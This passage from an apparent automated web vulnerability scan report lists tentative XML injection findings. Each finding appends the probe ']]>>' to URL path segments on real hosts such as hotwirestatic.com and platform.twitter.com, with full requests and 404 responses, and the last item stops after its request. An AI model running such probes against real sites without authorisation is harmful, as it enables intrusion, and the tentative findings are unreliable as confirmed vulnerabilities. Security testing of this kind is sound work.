The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/review-rating-symbols/4.0.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535943
Date: Mon, 03 Oct 2011 01:01:59 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.198. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/4.0.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols]]>>/4.0.gif?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.199. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/4.0.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/4.0.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols/4.0.gif]]>>?ver=146387 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.200. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/overall/3.5.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/review-rating-symbols/overall/3.5.gif?ver=185464 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:54 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.201. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/overall/3.5.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/review-rating-symbols/overall/3.5.gif?ver=185464 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.202. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/overall/3.5.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols]]>>/overall/3.5.gif?ver=185464 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.203. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/overall/3.5.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols/overall]]>>/3.5.gif?ver=185464 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:03 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.204. http://ak-static.hotwirestatic.com/static/images/review-rating-symbols/overall/3.5.gif [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/review-rating-symbols/overall/3.5.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/review-rating-symbols/overall/3.5.gif]]>>?ver=185464 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:08 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:08 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.205. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png?ver=177999 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:55 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.206. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 2]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png?ver=177999 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:58 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.207. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 3]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/tripWatcher]]>>/passiveModule/shoppingTools/img-tw-side-module.png?ver=177999 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:02 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.208. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 4]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/tripWatcher/passiveModule]]>>/shoppingTools/img-tw-side-module.png?ver=177999 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535997
Date: Mon, 03 Oct 2011 01:02:05 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.209. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 5]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/tripWatcher/passiveModule/shoppingTools]]>>/img-tw-side-module.png?ver=177999 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:10 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.210. http://ak-static.hotwirestatic.com/static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png [REST URL parameter 6]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png

Issue detail

The REST URL parameter 6 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 6. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/tripWatcher/passiveModule/shoppingTools/img-tw-side-module.png]]>>?ver=177999 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:15 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...

8.211. http://lb-static1-1568763564.us-east-1.elb.amazonaws.com/pix.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://lb-static1-1568763564.us-east-1.elb.amazonaws.com
Path:   /pix.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /pix.gif]]>>?acct_id=4079&ptype=product&cat=HOTEL&is_paid=0&prod_id=10417&prod_name=The%20Boston%20Park%20Plaza%20Hotel%20%26%20Towers&search_term=&session_id=DFE4F06BE571072B&is_conversion=&basket_value=&order_id=&version=0.2&url=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot%26hsv.showDetails%3Dtrue%26hotel.hid%3D10417%26hotel.hkey%3D10417_null_null_null_A1%3A0&ref=http%3A%2F%2Fwww.orbitz.com%2Fshop%2Fhotelsearch%3Ftype%3Dhotel%26hotel.keyword.key%3DBoston%252CUnited%2520States%26hotel.rooms%5B0%5D.adlts%3D1%26hotel.type%3Dkeyword%26hotel.chkin%3D10%2F04%2F11%26hotel.chkout%3D10%2F07%2F11%26search%3DSearch%26WT.mc_ev%3Dclick%26WT.mc_id%3Do_igo_merch_city_dated%26gcid%3DC11287x600-CYBoston%2CUnited%2520States%26lpid%3Dplhot&sid=undefined&cookie=uid%3D999836241826%3A&cookie2=uid%3D999836241826%3A%3A_uid%3D999836241826%3A&rand=0.5940432497300208&type=pageview&title=Boston HTTP/1.1
Host: lb-static1-1568763564.us-east-1.elb.amazonaws.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.keyword.key=Boston%2CUnited%20States&hotel.rooms[0].adlts=1&hotel.type=keyword&hotel.chkin=10/04/11&hotel.chkout=10/07/11&search=Search&WT.mc_ev=click&WT.mc_id=o_igo_merch_city_dated&gcid=C11287x600-CYBoston,United%20States&lpid=plhot&hsv.showDetails=true&hotel.hid=10417&hotel.hkey=10417_null_null_null_A1:0
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Date: Mon, 03 Oct 2011 00:32:28 GMT
Server: lighttpd/1.4.19
Content-Length: 345
Connection: keep-alive

<?xml version="1.0" encoding="iso-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w
...[SNIP]...

8.212. http://platform.twitter.com/widgets/images/t.gif [REST URL parameter 1]

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://platform.twitter.com
Path:   /widgets/images/t.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /widgets]]>>/images/t.gif?_=1317601602154&count=none&id=twitter_tweet_button_0&lang=en&original_referer=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&text=CME%20Group%20%E2%80%93%C2%A0How%20the%20World%20Advances&url=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&twttr_referrer=http%3A%2F%2Fwww.cmegroup.com%2Fadvance%2F&twttr_li=0&twttr_widget=1&twttr_guest_id=v1%3A131479755238577138 HTTP/1.1
Host: platform.twitter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://platform.twitter.com/widgets/tweet_button.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
